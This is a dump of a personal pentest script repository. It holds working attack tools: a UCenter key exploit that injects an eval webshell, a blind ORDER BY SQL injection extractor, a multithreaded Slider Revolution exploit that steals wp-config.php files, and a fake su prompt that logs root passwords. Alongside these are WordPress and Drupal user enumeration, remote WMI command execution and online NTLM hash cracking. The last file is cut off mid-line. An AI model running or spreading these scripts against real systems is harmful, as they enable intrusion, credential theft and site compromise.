├── bat └── tips.txt ├── php ├── tips.txt └── wp_login_bruteforce.php ├── pl └── tips.txt ├── py ├── tips.txt ├── eg.txt ├── socket-http.py ├── mygoo.py ├── su_rubbish_hijack.py ├── domailtools.py ├── kali_tools_installer.py ├── replace_mail.py ├── remote_ssh_down.py ├── getdrupaluser.py ├── ophcrack.py ├── bing.py ├── getwpuser.py ├── secwiki.py ├── uc_key_exp.py ├── orderby_sqli.py ├── wp_srp_exp.py ├── google_result.py ├── drupal_bruterforce.py ├── tomcat_crack.py └── cobaltstrike_update.py ├── sh ├── tips.txt ├── wp_user_bruterforce.sh └── pentest4ubuntu.sh ├── vbs ├── tips.txt ├── vbexec.vbs ├── iis6_remove_log.vbs └── cmd.asp.vbs ├── powershell └── tips.txt ├── README.md ├── conf └── vimrc.dark └── export.opml /bat/tips.txt: -------------------------------------------------------------------------------- 1 | bat -------------------------------------------------------------------------------- /php/tips.txt: -------------------------------------------------------------------------------- 1 | php -------------------------------------------------------------------------------- /pl/tips.txt: -------------------------------------------------------------------------------- 1 | perl -------------------------------------------------------------------------------- /py/tips.txt: -------------------------------------------------------------------------------- 1 | python -------------------------------------------------------------------------------- /sh/tips.txt: -------------------------------------------------------------------------------- 1 | bash -------------------------------------------------------------------------------- /vbs/tips.txt: -------------------------------------------------------------------------------- 1 | vbs -------------------------------------------------------------------------------- /powershell/tips.txt: -------------------------------------------------------------------------------- 1 | powershell -------------------------------------------------------------------------------- /sh/wp_user_bruterforce.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/darkr4y/pentest-script/HEAD/sh/wp_user_bruterforce.sh -------------------------------------------------------------------------------- /py/eg.txt: -------------------------------------------------------------------------------- 1 | Megan Greene, Nonresident Senior Fellow 2 | Alexei Monsarrat, Nonresident Senior Fellow 3 | 4 | Barry Pavel, Vice President and Director 5 | Jeffrey Lightfoot, Deputy Director 6 | Magnus Nordenman, Deputy Director 7 | HuiHui Ooi, Assistant Director 8 | 9 | -------------------------------------------------------------------------------- /py/socket-http.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin env python 2 | import socket 3 | host="www.blackh4t.org" 4 | port=80 5 | se=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 6 | se.connect((host,port)) 7 | se.send("GET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\r\nHost: %s\r\n\r\n" % host) 8 | while True: 9 | result = se.recv(1024) 10 | if not len(result ): 11 | break 12 | print result 13 | -------------------------------------------------------------------------------- /py/mygoo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2,urllib 4 | import simplejson 5 | 6 | seachstr = 'inurl:docs/funcspecs/3.jsp' 7 | 8 | for x in range(5): 9 | print "page:%s" % (x+1) 10 | page = x * 4 11 | url = ('https://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=%s&rsz=8&start=%s') % (urllib.quote(seachstr),page) 12 | try: 13 | request = urllib2.Request( 14 | url, None, {'Referer': 'http://www.sina.com'}) 15 | response = urllib2.urlopen(request) 16 | results = simplejson.load(response) 17 | infoaaa = results['responseData']['results'] 18 | except Exception,e: 19 | print e 20 | else: 21 | for minfo in infoaaa: 22 | print minfo['url'] 23 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | #pentest-script 2 | 3 | ``` 4 | ___ ___ __ .__ ____________________ __________ ._. 5 | / | \_____ ____ | | _|__| ____ ____ / | \_ _____/ | \ \| | 6 | / ~ \__ \ _/ ___\| |/ / |/ \ / ___\ / | || __) | | / | \ | 7 | \ Y // __ \\ \___| <| | | \/ /_/ > ^ / \ | | / | \| 8 | \___|_ /(____ /\___ >__|_ \__|___| /\___ /\____ |\___ / |______/\____|__ /_ 9 | \/ \/ \/ \/ \//_____/ |__| \/ \/\/ 10 | 11 | ``` 12 | 13 | ####scripts used in my pentest work. 14 | 15 | aciiart made from - http://patorjk.com/software/taag/ 16 | -------------------------------------------------------------------------------- /py/su_rubbish_hijack.py: -------------------------------------------------------------------------------- 1 | #set alias = xxx.py 2 | #!/usr/bin/python 3 | import os, sys, getpass, time 4 | 5 | current_time = time.strftime("%Y-%m-%d %H:%M") 6 | logfile="/dev/shm/.su.log" 7 | #CentOS 8 | #fail_str = "su: incorrect password" 9 | #Ubuntu 10 | #fail_str = "su: Authentication failure" 11 | #For Linux Korea - centos,ubuntu,korea 切换root用户失败提示不一样 12 | fail_str = "su: incorrect password" 13 | try: 14 | passwd = getpass.getpass(prompt='Password: '); 15 | file=open(logfile,'a') 16 | file.write("[%s]t%s"%(passwd, current_time)) 17 | file.write('n') 18 | file.close() 19 | except: 20 | pass 21 | time.sleep(1) 22 | print fail_str 23 | -------------------------------------------------------------------------------- /py/domailtools.py: -------------------------------------------------------------------------------- 1 | #encoding: UTF-8 2 | 3 | import urllib2 4 | import re 5 | import socket 6 | import time 7 | 8 | rfile = open('./ip.txt') 9 | 10 | wfile = open('./result.csv', 'a+') 11 | 12 | for line in rfile: 13 | 14 | opener = urllib2.build_opener() 15 | time.sleep(0.5) 16 | opener.addheaders = [('User-Agent', 'Mozilla/6.0 (Linux 5.5; rv:6.0.2) Gecko/20140101 Firefox/6.0.0')] 17 | req = opener.open('http://reverseip.domaintools.com/search/?q='+line.strip()) 18 | socket.setdefaulttimeout(8) 19 | responseHtml = req.read() 20 | match = re.findall(r'', responseHtml) 21 | wfile.write(socket.gethostbyname(line.strip())+','+'\n') 22 | 23 | print line.strip() 24 | 25 | for val in match: 26 | wfile.write(val+','+'\n') 27 | wfile.write('\n') 28 | rfile.close() 29 | wfile.close() 30 | -------------------------------------------------------------------------------- /py/kali_tools_installer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #coding=utf-8 3 | 4 | import commands 5 | import sys 6 | 7 | 8 | _base = "git://git.kali.org/" 9 | _catlog = "packages/" 10 | _extname = ".git" 11 | 12 | def get_kali_toollist(): 13 | print "Site - http://tools.kali.org/tools-listing" 14 | pass 15 | 16 | def show_sys_ver(): 17 | print "Your linux is :" 18 | print commands.getoutput("cat /etc/issue") 19 | pass 20 | 21 | def check_git(): 22 | 23 | pass 24 | def install( name ): 25 | url = _base + _catlog + name + _extname 26 | #print url 27 | print commands.getoutput("git clone " + url) 28 | pass 29 | 30 | def usage(): 31 | print sys.argv[0] + " install [ tool name ]" 32 | pass 33 | 34 | def main(): 35 | if len(sys.argv) != 3: 36 | usage() 37 | return 38 | pass 39 | show_sys_ver() 40 | get_kali_toollist() 41 | toolname = sys.argv[2] 42 | print "u will install [ " + toolname + " ]" 43 | install(toolname) 44 | pass 45 | 46 | if __name__ == '__main__': 47 | main() 48 | -------------------------------------------------------------------------------- /vbs/vbexec.vbs: -------------------------------------------------------------------------------- 1 | Option Explicit 2 | Dim target, username, password, strCommand, objSWbemLocator, objSWbemServices, objProcess, intProcessID, errReturn 3 | If WScript.Arguments.Count = 4 Then 4 | target = WScript.Arguments.Item(0) 5 | username = WScript.Arguments.Item(1) 6 | password = WScript.Arguments.Item(2) 7 | strCommand = WScript.Arguments.Item(3) 8 | Else 9 | Wscript.Echo "Usage: vbExec.vbs target username password command" 10 | Wscript.Quit 11 | End If 12 | set objSWbemLocator = CreateObject("WbemScripting.SWbemLocator") 13 | set objSWbemServices = objSWbemLocator.ConnectServer(target, "root\cimv2", username, password) 14 | objSWbemServices.Security_.ImpersonationLevel = 3 15 | objSWbemServices.Security_.AuthenticationLevel = 6 16 | set objProcess = objSWbemServices.Get("Win32_Process") 17 | errReturn = objProcess.Create(strCommand, null, null, intProcessID) 18 | If errReturn = 0 Then 19 | Wscript.Echo "Process was started with ID: " & intProcessID 20 | Else 21 | Wscript.Echo "Process could not be started due to error: " & errReturn 22 | End If 23 | -------------------------------------------------------------------------------- /py/replace_mail.py: -------------------------------------------------------------------------------- 1 | #coding=utf8 2 | 3 | #replace like Damon M. Wilson,Digital Department 4 | #to DMWilson@domain.com - u can test with eg.txt 5 | #by darkr4y | thx tm3y ;) 6 | import re 7 | 8 | 9 | def main(): 10 | path = raw_input("Plz input the path of maillist:") 11 | f = open(path,"r") 12 | for line in f: 13 | newline,numbers = re.subn(",(.*)","",line) 14 | if newline == "\n": 15 | continue 16 | newline = newline.strip() 17 | splitline = newline.split(" ") 18 | #print splitline 19 | if len(splitline) == 2: 20 | inline = splitline[0][:1] + splitline[-1] 21 | if len(splitline) == 3: 22 | inline = splitline[0][:1] + splitline[1][:1] + splitline[-1] 23 | inline += "@test.com" 24 | inline = inline.replace("\n","") 25 | inline = inline.lower() 26 | #print `newline`, 27 | print inline 28 | #break 29 | pass 30 | f.close() 31 | 32 | 33 | if __name__ == "__main__": 34 | main() 35 | pass 36 | -------------------------------------------------------------------------------- /py/remote_ssh_down.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | from __future__ import with_statement 5 | from fabric.api import cd,run,env,settings,hide 6 | import socket 7 | from StringIO import StringIO 8 | 9 | hostname = 'home.blackh4t.org' 10 | ip = socket.gethostbyname(hostname) 11 | username = 'root' 12 | password = '' 13 | port = '29441' 14 | env.hosts=[username + '@' + ip + ':'+ port,] #ssh要用到的参数 15 | env.password = password 16 | 17 | def down(url): 18 | strio = StringIO() 19 | print "[***] remote ssh simple http file server ..." 20 | with settings( 21 | hide('warnings', 'running','output'), #stdout , stderr 22 | warn_only=True 23 | ): 24 | with cd('/tmp'): 25 | wget_rs = run('wget -O --no-check-certificate ' + url) #远程操作用run 26 | # Saving to: `packer_0.8.1_darwin_amd64.zip.6' 27 | print type(wget_rs) 28 | print wget_rs 29 | 30 | 31 | #print 'http://' + ip + '/' + save_name 32 | run('python -m SimpleHTTPServer 8888' , stdout = strio) 33 | 34 | ''' 35 | !!!first use!!! 36 | pip install fabric 37 | usage: 38 | fab -f remote_ssh_down down:url=xxxx 39 | sh -c "echo " 40 | - bash file content - 41 | =============================================== 42 | 43 | ''' 44 | -------------------------------------------------------------------------------- /py/getdrupaluser.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import sys 3 | import urllib 4 | import re 5 | 6 | host = "" 7 | url_v = "" 8 | url_u = "" 9 | user = [] 10 | 11 | def usage(): 12 | print "Get Drupal Users" 13 | print "From - http://www.madirish.net/node/465" 14 | print "Usage: getuser_drupal.py host" 15 | 16 | 17 | def check_version(): 18 | pass 19 | 20 | def enum_user(): 21 | pass 22 | 23 | def main(): 24 | global host 25 | global user 26 | if len(sys.argv) == 2: 27 | host = sys.argv[1] 28 | url_v = 'http://'+ host + '/CHANGELOG.txt' 29 | url_u = 'http://'+ host + '/?q=admin/views/ajax/autocomplete/user/' 30 | r = urllib.urlopen(url_v) 31 | r.readline() #igone blank line 32 | print "version: " + r.readline() 33 | r = "" 34 | for i in xrange(97,123,1): 35 | #print "Detecting .... " + chr(i) 36 | r = urllib.urlopen(url_u + chr(i)).read() 37 | #s = re.sub('"(.*?)"',r'\1',r) 38 | s = re.findall('"(.*?)"',r) 39 | user.extend(s) 40 | 41 | user = {}.fromkeys(user).keys() 42 | #print user 43 | for s in user: 44 | print s 45 | print 46 | print "-------------------------------------------------------" 47 | print "Someone has coded a nice tool" 48 | print "From - http://www.madirish.net/index.html?article=443" 49 | else: 50 | usage() 51 | pass 52 | 53 | 54 | 55 | if __name__ == "__main__": 56 | main() 57 | -------------------------------------------------------------------------------- /py/ophcrack.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import urllib 3 | import urllib2 4 | import re 5 | import time 6 | 7 | SITE = "http://www.objectif-securite.ch/en/ophcrack.php" 8 | 9 | def post(url, data): 10 | req = urllib2.Request(url) 11 | data = urllib.urlencode(data) 12 | #enable cookie 13 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor()) 14 | response = opener.open(req, data) 15 | return response.read() 16 | 17 | def checkhash(temp_hash): 18 | global SITE 19 | d = {'hash':temp_hash} 20 | r = post(SITE,d) 21 | #print r 22 | s = re.findall('(.*?)<\/table>',r) 23 | ss = re.findall('(.*?)<\/b>',s[0]) 24 | print 25 | print ss[1] 26 | print "-------------------------------------------" 27 | print "By Ma5ter" 28 | pass 29 | 30 | def usage(): 31 | print "Ophcrack NTLM Hash" 32 | print "Usage: ophcrack.py hash" 33 | print "Usage: ophcrack.py -f hash-file" 34 | print "-------------------------------------------" 35 | print "hash-format: username(current):x32:x32::::" 36 | 37 | def main(): 38 | if len(sys.argv) == 2: 39 | _hash = sys.argv[1] 40 | checkhash(_hash) 41 | 42 | elif len(sys.argv) == 3: 43 | if (sys.argv[1] == "-f"): 44 | f = open(sys.argv[2],'r') 45 | for i in f: 46 | i = i.strip() 47 | print i 48 | pass 49 | else: 50 | usage() 51 | 52 | else: 53 | usage() 54 | pass 55 | 56 | 57 | 58 | if __name__ == "__main__": 59 | main() 60 | -------------------------------------------------------------------------------- /conf/vimrc.dark: -------------------------------------------------------------------------------- 1 | "=========================================================================================================== 2 | "added by darkray 3 | " 第一次更新 2014 - 06 4 | " 说明链接 http://hi.baidu.com/aroundtw/item/6bb43652c7c84e928c12ede4 5 | " todo-list: 6 | " 1.完善每项设置的中文注释 7 | " 2.增加流行的插件管理方式 8 | " 一个已经配置好的轻量的 http://www.oschina.net/code/snippet_616273_13749 9 | "=========================================================================================================== 10 | " wget https://github.com/darkr4y/pentest-script/raw/master/conf/vimrc.dark && cat vimrc.dark >> /etc/vim/vimrc 11 | 12 | " 设置帮助信息语言 13 | set helplang=cn 14 | " 显示行号 15 | set nu 16 | " 语法高亮 17 | syntax enable 18 | syntax on 19 | " 当前配色方案 20 | colorscheme desert 21 | 22 | " 这里没查到是神码意思 23 | se nocompatible 24 | se bs=2 25 | 26 | 27 | 28 | " 保存文件快捷键 29 | " 使用ctrl+s保存文件 30 | " note: you must add in ${HOME}/.bashrc 31 | nmap :update 32 | vmap :update 33 | imap :update 34 | 35 | " 退出快捷键 36 | " 使用ctrl+q退出vim 37 | nmap :quit 38 | vmap :quit 39 | imap :quit 40 | 41 | " set fold 42 | " za 打开/关闭当前折叠 43 | " zA 循环地打开/关闭当前折叠 44 | " zo 打开当前折叠 45 | " zc 关闭当前折叠 46 | " zM 关闭所有折叠 47 | " zR 打开所有折叠 48 | set foldmethod=syntax 49 | set foldlevel=100 50 | 51 | " Tab缩进相关配置 52 | set smarttab 53 | set tabstop=4 54 | set softtabstop=4 55 | "设置为4个空格表示一个tab 56 | set shiftwidth=4 57 | set expandtab 58 | "继承前一行的缩进方式,特别适用于多行注释 59 | set autoindent 60 | "为C程序提供自动缩进 61 | set smartindent 62 | "使用C样式的缩进 63 | set cindent 64 | " 在状态行上显示光标所在位置的行号和列号 65 | set ruler 66 | set rulerformat=%20(%2*%<%f%=\ %m%r\ %3l\ %c\ %p%%%) 67 | 68 | 69 | " 记住上次编辑位置 70 | au BufReadPost * if line("'\"") > 0|if line("'\"") <= line("$")|exe("norm '\"")|else|exe "norm $"|endif|endif 71 | 72 | " 设置高亮搜索 73 | set hlsearch 74 | 75 | " 自动检测对应文件类型并加载配置 76 | filetype plugin indent on 77 | 78 | " 光标所在行高亮 79 | set cursorline 80 | 81 | " 默认搜索忽略大小 82 | set ignorecase 83 | 84 | " 默认不产生备份文件 85 | set nobackup 86 | 87 | 88 | -------------------------------------------------------------------------------- /py/bing.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import socket 3 | import urllib2 4 | import re 5 | 6 | SITE_LIST = [] 7 | SEARCHURL = "http://www.bing.com/search?q=ip:" 8 | 9 | enable_proxy = False 10 | proxy_handler = urllib2.ProxyHandler({"http" : 'http://127.0.0.1:8080'}) 11 | null_proxy_handler = urllib2.ProxyHandler({}) 12 | 13 | if enable_proxy: 14 | opener = urllib2.build_opener(proxy_handler) 15 | else: 16 | opener = urllib2.build_opener(null_proxy_handler) 17 | 18 | urllib2.install_opener(opener) 19 | #---------------------------------------------------------------- 20 | def usage(): 21 | print "Bing Batch Search Tools" 22 | print "Usage: bing.py www.blackh4t.org" 23 | print "Usage: bing.py -s 8.8.8.8" 24 | 25 | def main(): 26 | global SITE_LIST 27 | global SEARCHURL 28 | if len(sys.argv) == 2: 29 | host = sys.argv[1] 30 | ip = socket.gethostbyname(host) 31 | print ip 32 | request = urllib2.Request(SEARCHURL + ip) 33 | request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 5.2; rv:28.0) Gecko/20100101 Firefox/28.0') 34 | request.add_header('Accept-Language', 'en-US,en;q=0.5') 35 | r = urllib2.urlopen(request).read() 36 | count = re.findall('(.*?)<\/span>',r) 37 | print "total: " + count[0] 38 | site = re.findall('(.*?)<\/cite>',r) 39 | print site 40 | r.close() 41 | #eg: page 5 - first=41 42 | print "because of BING's restrick,only 10 pages result can crawled." 43 | for i in xrange(11,31,10): 44 | print SEARCHURL + ip + "&first=" + str(i) 45 | request = urllib2.Request(SEARCHURL + ip + "&first=" + i) 46 | request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 5.2; rv:28.0) Gecko/20100101 Firefox/28.0') 47 | request.add_header('Accept-Language', 'en-US,en;q=0.5') 48 | r = urllib2.urlopen(request).read() 49 | sites = re.findall('(.*?)<\/cite>',r) 50 | print sites 51 | r.close() 52 | 53 | 54 | elif len(sys.argv) == 3: 55 | if sys.argv[1] == '-s': 56 | pass 57 | print "-------------------------------------------------------" 58 | else: 59 | usage() 60 | pass 61 | 62 | 63 | 64 | if __name__ == "__main__": 65 | main() 66 | -------------------------------------------------------------------------------- /py/getwpuser.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import sys 3 | import urllib 4 | import httplib 5 | import re 6 | import urlparse 7 | #import requests 8 | 9 | count = 100 10 | #httplib.HTTPConnection.debuglevel = 1 11 | 12 | def savefile(text): 13 | pass 14 | 15 | def checktitle(target): 16 | i = 1 17 | for i in range(count): 18 | url='http://' + target + '/?author=%s' % i 19 | pattern='(.*) \|' 20 | try: 21 | #r=requests.get(url) 22 | r = urllib.urlopen(url).read() 23 | except Exception,e: 24 | print e 25 | #text=r.text 26 | text = r 27 | regux=re.compile(pattern) 28 | result=regux.findall(text) 29 | print result 30 | re_str=''.join(result) 31 | if re_str not in [u'\u672a\u627e\u5230\u9875\u9762']: 32 | n_str=str(i)+':'+re_str 33 | print n_str 34 | #print "%d:%s" % (i,list) 35 | 36 | ## BUG: cannot get from Freebuf.com 37 | 38 | def checkurl(target): 39 | i = 1 40 | for i in range(count): 41 | conn = httplib.HTTPConnection(target) 42 | headers={"User-Agent":"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"} 43 | conn.request('GET','/?author=%s' % i,headers=headers) 44 | r = conn.getresponse() 45 | #print r.status 46 | if r.status == 301: 47 | url = 'http://' + target + '/?author=%s' % i 48 | a = urllib.urlopen(url).geturl() 49 | a = urlparse.urlparse(a) 50 | #print 'path:',a.path 51 | #astr = a.path[:-1] 52 | #astr = astr[astr.rindex('/')+1:] 53 | apos = a.path.rindex('/') 54 | bpos = len(a.path.split('/')) 55 | if apos == len(a.path)-1 : 56 | print a.path.split('/')[bpos-2] 57 | else: 58 | print a.path.split('/')[bpos-1] 59 | #print str(i) + ':' + astr 60 | 61 | 62 | 63 | def usage(): 64 | print '<Usage>:' 65 | print '\t GetWPUser <type> <url>' 66 | print '<Type> :' 67 | print '\t 1 - From Title' 68 | print '\t 2 - From URL (Handler 302)' 69 | print '<Eg.> :' 70 | print '\t GetWPUser 2 www.blackh4t.org' 71 | print '' 72 | print '\t\t\t by DarkR4y.' 73 | 74 | def main(): 75 | if len(sys.argv) == 3: 76 | t = sys.argv[1] 77 | target = sys.argv[2] 78 | if t == '1': 79 | checktitle(target) 80 | if t == '2': 81 | checkurl(target) 82 | else: 83 | usage() 84 | pass 85 | 86 | 87 | 88 | if __name__ == "__main__": 89 | main() 90 | 91 | -------------------------------------------------------------------------------- /py/secwiki.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import sys 3 | import time 4 | import urllib2 5 | #import urllib 6 | #import re 7 | from sgmllib import SGMLParser 8 | 9 | 10 | 11 | class ListURL(SGMLParser): 12 | def reset(self): 13 | self.URLlist = [] 14 | self.flag = False 15 | self.getdata = False 16 | self.verbatim = 0 17 | self.URLs = [] 18 | SGMLParser.reset(self) 19 | 20 | def start_table(self, attrs): 21 | self.flag = True 22 | #print self.flag 23 | if self.flag == True: 24 | self.verbatim +=1 25 | return 26 | 27 | 28 | def end_table(self): 29 | if self.verbatim == 0: 30 | self.flag = False 31 | if self.flag == True: 32 | self.verbatim -=1 33 | 34 | def start_a(self, attrs): 35 | if self.flag == False: 36 | return 37 | #self.getdata = True 38 | for k,v in attrs: 39 | if k == 'target' and v == '_blank': 40 | self.getdata = True 41 | href = [v for k, v in attrs if k == "href" and v.find('index.php?type=')<0 ] 42 | self.URLs.extend(href) 43 | 44 | 45 | 46 | 47 | def end_a(self): 48 | if self.getdata: 49 | self.getdata = False 50 | 51 | def handle_data(self, text): 52 | if self.getdata: 53 | self.URLlist.append(text) 54 | 55 | def printTitle(self): 56 | for i in self.URLlist: 57 | print i 58 | for j in self.URLs: 59 | print j 60 | 61 | def printURL(self): 62 | for i in self.URLs: 63 | print i 64 | 65 | 66 | 67 | 68 | if len(sys.argv) < 2: 69 | print '\nUsage:' 70 | print '\t%s --dump' % sys.argv[0] 71 | print '\t%s --about' % sys.argv[0] 72 | sys.exit(1) 73 | 74 | def banner(): 75 | print ''' 76 | dump secwiki urls... 77 | by DarkR4y. 78 | BLog: www.blackh4t.org 79 | ''' 80 | 81 | option = sys.argv[1] 82 | 83 | 84 | if option == '--dump': 85 | 86 | try: 87 | #banner() 88 | 89 | def secwiki(): 90 | site = 'http://wiki.ourren.com/' 91 | for p in range(1,47): 92 | rest = 'index.php?p=%s' % p 93 | req = urllib2.Request(site+rest) 94 | try: 95 | fd = urllib2.urlopen(req) 96 | data = fd.read() 97 | #print data 98 | t = ListURL() 99 | t.feed(data) 100 | t.printTitle() 101 | t.printURL() 102 | 103 | except urllib2.URLError: print '[+] site: %s \t\t\t[+] Error: seems to be down' % site 104 | 105 | secwiki() 106 | 107 | 108 | except KeyboardInterrupt: print '\nTerminated by user ...' 109 | 110 | elif option == '--about': 111 | banner() 112 | 113 | else: banner() 114 | -------------------------------------------------------------------------------- /py/uc_key_exp.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | #coding=utf-8 3 | import hashlib 4 | import time 5 | import math 6 | import base64 7 | import urllib 8 | import urllib2 9 | import sys 10 | 11 | def microtime(get_as_float = False) : 12 | if get_as_float: 13 | return time.time() 14 | else: 15 | return '%.8f %d' % math.modf(time.time()) 16 | 17 | def get_authcode(string, key = ''): 18 | ckey_length = 4 19 | key = hashlib.md5(key).hexdigest() 20 | keya = hashlib.md5(key[0:16]).hexdigest() 21 | keyb = hashlib.md5(key[16:32]).hexdigest() 22 | keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:] 23 | #keyc = (hashlib.md5('0.736000 1389448306').hexdigest())[-ckey_length:] 24 | cryptkey = keya + hashlib.md5(keya+keyc).hexdigest() 25 | 26 | key_length = len(cryptkey) 27 | string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string 28 | string_length = len(string) 29 | result = '' 30 | box = range(0, 256) 31 | rndkey = dict() 32 | for i in range(0,256): 33 | rndkey[i] = ord(cryptkey[i % key_length]) 34 | j=0 35 | for i in range(0,256): 36 | j = (j + box[i] + rndkey[i]) % 256 37 | tmp = box[i] 38 | box[i] = box[j] 39 | box[j] = tmp 40 | a=0 41 | j=0 42 | for i in range(0,string_length): 43 | a = (a + 1) % 256 44 | j = (j + box[a]) % 256 45 | tmp = box[a] 46 | box[a] = box[j] 47 | box[j] = tmp 48 | result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256])) 49 | return keyc + base64.b64encode(result).replace('=', '') 50 | 51 | def get_shell(url,key,host): 52 | ''' 53 | 发送命令获取webshell 54 | ''' 55 | headers={'Accept-Language':'zh-cn', 56 | 'Content-Type':'application/x-www-form-urlencoded', 57 | 'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)', 58 | 'Referer':url 59 | } 60 | tm = time.time()+10*3600 61 | tm="time=%d&action=updateapps" %tm 62 | code = urllib.quote(get_authcode(tm,key)) 63 | url=url+"?code="+code 64 | data1='''<?xml version="1.0" encoding="ISO-8859-1"?> 65 | <root> 66 | <item id="UC_API">http://xxx\');eval($_POST[1]);//</item> 67 | </root>''' 68 | try: 69 | req=urllib2.Request(url,data=data1,headers=headers) 70 | ret=urllib2.urlopen(req) 71 | except: 72 | return "访问出错" 73 | data2='''<?xml version="1.0" encoding="ISO-8859-1"?> 74 | <root> 75 | <item id="UC_API">http://aaa</item> 76 | </root>''' 77 | try: 78 | req=urllib2.Request(url,data=data2,headers=headers) 79 | ret=urllib2.urlopen(req) 80 | except: 81 | return "error" 82 | return "webshell:"+host+"/config/config_ucenter.php,password:1" 83 | 84 | if __name__ == '__main__': 85 | host=sys.argv[1] 86 | key=sys.argv[2] 87 | url=host+"/api/uc.php" 88 | print get_shell(url,key,host) 89 | -------------------------------------------------------------------------------- /py/orderby_sqli.py: -------------------------------------------------------------------------------- 1 | # ORDER BY data extractor (bogdan [at] acunetix.com) 2 | import httplib, urllib, sys, string 3 | from string import replace 4 | # various configuration parameters 5 | HOSTNAME = "ctf.xdsec.org" 6 | PORT = "2013" 7 | URL = "/hackgame/injection/index.php?order=" 8 | # the string that is returned when the condition is true 9 | #TRUE_STRING = "1 - <b>admin</b> - Clear Rivers - admin@email.com<br> 3- <b>John</b>" 10 | TRUE_STRING = "<td>1</td><td>欢迎来到西电网络攻防大赛</td><td>2013-09-30</td></tr><tr><td>2</td><td>西电网络攻防大赛已成功举办三届,本届为第四届</td><td>2013-09-30</td></tr><tr><td>3</td><td>参赛选手以队为单位参赛,每队1-3人,每名选手只能参加一支参赛队伍</td><td>2013-10-01</td></tr><tr><td>4</td><td>全国各地的安全技术爱好者均可参赛,特别鼓励在校学生参赛。各参赛队应该如实填写个人信息,参赛队所有核心</td>" 11 | # function to perform the actual data extraction using boolean queries 12 | def extract_data(extract_data_query): 13 | print "Query: " + extract_data_query 14 | result = "" 15 | # bits array 16 | bits = [1, 2, 4, 8, 16, 32, 64, 128] 17 | char = 1 18 | while (1): 19 | i = 0 20 | value = 0 21 | while (i < 8): 22 | # prepare request 23 | h1 = httplib.HTTPConnection(HOSTNAME, PORT, timeout=20) 24 | params = {} 25 | # http headers 26 | headers = {"Host": HOSTNAME, 27 | "Accept": "*/*", 28 | "User-Agent": "Mozilla/4.0 (Acunetix WVS)"} 29 | # prepare SQL query 30 | query = "(case when (ORD(MID((" + extract_data_query + ")," + str(char) + ",1))& " + str(bits[i]) + " >0) then id else 3 end)" 31 | # make HTTP request 32 | h1.request("GET", URL + urllib.quote_plus(query), params, headers) 33 | try: 34 | r1 = h1.getresponse() 35 | except: 36 | print "error ..." 37 | sys.exit() 38 | # check HTTP status code (we are looking for a 200 response) 39 | if r1.status <> 200: 40 | print "invalid status code: " + str(r1.status) 41 | sys.exit() 42 | # good status code, move on ... 43 | data = r1.read() 44 | # determine bit value based on data, search true string 45 | if string.find(data, TRUE_STRING) != -1: 46 | print "1", 47 | value = value + bits[i] 48 | else: 49 | print "0", 50 | h1.close() 51 | # move to the next bit 52 | i = i + 1 53 | # game over? 54 | if value == 0: 55 | print " DONE" 56 | return result 57 | else: 58 | print " => " + str(value) + " => '" + chr(value) + "'" 59 | # save the current char, move on to the next one 60 | result = result + chr(value) 61 | char = char + 1 62 | # main function 63 | def main(): 64 | # check for input params 65 | if len(sys.argv)<=1: 66 | print "usage orderby.py SQL_QUERY_TO_EXTRACT_DATA" 67 | sys.exit() 68 | query = sys.argv[1] 69 | print "[*] ORDER BY data extractor (bogdan [at] acunetix.com) [*]" 70 | print "" 71 | # extract the data 72 | data = extract_data(query) 73 | print "" 74 | print "result => " + data 75 | if __name__ == '__main__': 76 | main() 77 | -------------------------------------------------------------------------------- /py/wp_srp_exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding:utf-8 3 | # Author: DarkR4y | www.blackh4t.org 4 | # Purpose: 5 | # Some code copy from - http://kendyhikaru.blogspot.com/2012/10/python-multithread-to-read-one-file.html 6 | # Vuln detail - http://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html 7 | import os,sys 8 | import urllib,urllib2 9 | import re 10 | import thread,threading,Queue 11 | import urlparse 12 | import logging 13 | import time 14 | #为了解决异常 15 | import socket 16 | import httplib 17 | 18 | logfile = 'log.txt' 19 | logger = logging.getLogger() 20 | hdlr = logging.FileHandler(logfile) 21 | formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s') 22 | hdlr.setFormatter(formatter) 23 | logger.addHandler(hdlr) 24 | logger.setLevel(logging.NOTSET) 25 | 26 | savepath = os.getcwd() + os.path.sep + 'rs' + os.path.sep 27 | payload = "wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php" 28 | #Number of threads 29 | n_thread = 5 30 | #Create queue 31 | queue = Queue.Queue() 32 | 33 | class ThreadProcess(threading.Thread): 34 | def __init__(self, queue): 35 | threading.Thread.__init__(self) 36 | self.queue = queue 37 | 38 | def exp(self,url,name): 39 | print "Exploiting - %s" % url 40 | try: 41 | f = urllib2.urlopen(url, timeout=5).read() 42 | if (f[:2] == "<?"): 43 | with open(name, "wb") as code: 44 | code.write(f) 45 | else: 46 | logger.info(url + " has no vuln") 47 | #print url + " has no vuln!" 48 | pass 49 | except httplib.BadStatusLine,e: 50 | logger.error("[%s] %s",url,e) 51 | except socket.error, 